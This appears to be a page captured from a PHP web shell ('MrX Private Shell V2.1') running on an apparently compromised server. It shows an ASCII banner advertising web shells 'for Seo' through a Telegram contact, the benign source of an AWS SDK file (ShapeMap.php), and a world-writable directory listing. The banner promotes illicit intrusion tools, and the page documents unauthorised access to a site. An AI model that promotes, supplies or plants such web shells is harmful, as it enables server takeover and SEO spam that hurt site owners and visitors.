__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Aws\Api;
/**
* Builds shape based on shape references.
*/
class ShapeMap
{
/** @var array */
private $definitions;
/** @var Shape[] */
private $simple;
/**
* @param array $shapeModels Associative array of shape definitions.
*/
public function __construct(array $shapeModels)
{
$this->definitions = $shapeModels;
}
/**
* Get an array of shape names.
*
* @return array
*/
public function getShapeNames()
{
return array_keys($this->definitions);
}
/**
* Resolve a shape reference
*
* @param array $shapeRef Shape reference shape
*
* @return Shape
* @throws \InvalidArgumentException
*/
public function resolve(array $shapeRef)
{
$shape = $shapeRef['shape'];
if (!isset($this->definitions[$shape])) {
throw new \InvalidArgumentException('Shape not found: ' . $shape);
}
$isSimple = count($shapeRef) == 1;
if ($isSimple && isset($this->simple[$shape])) {
return $this->simple[$shape];
}
$definition = $shapeRef + $this->definitions[$shape];
$definition['name'] = $definition['shape'];
if (isset($definition['shape'])) {
unset($definition['shape']);
}
$result = Shape::create($definition, $this);
if ($isSimple) {
$this->simple[$shape] = $result;
}
return $result;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ErrorParser | Folder | 0777 |
|
|
| Parser | Folder | 0777 |
|
|
| Serializer | Folder | 0777 |
|
|
| AbstractModel.php | File | 1.96 KB | 0777 |
|
| ApiProvider.php | File | 7.47 KB | 0777 |
|
| DateTimeResult.php | File | 4.09 KB | 0777 |
|
| DocModel.php | File | 3.38 KB | 0777 |
|
| ListShape.php | File | 786 B | 0777 |
|
| MapShape.php | File | 1.14 KB | 0777 |
|
| Operation.php | File | 3.38 KB | 0777 |
|
| Service.php | File | 13.53 KB | 0777 |
|
| Shape.php | File | 1.81 KB | 0777 |
|
| ShapeMap.php | File | 1.46 KB | 0777 |
|
| StructureShape.php | File | 1.65 KB | 0777 |
|
| TimestampShape.php | File | 1.45 KB | 0777 |
|
| Validator.php | File | 10.04 KB | 0777 |
|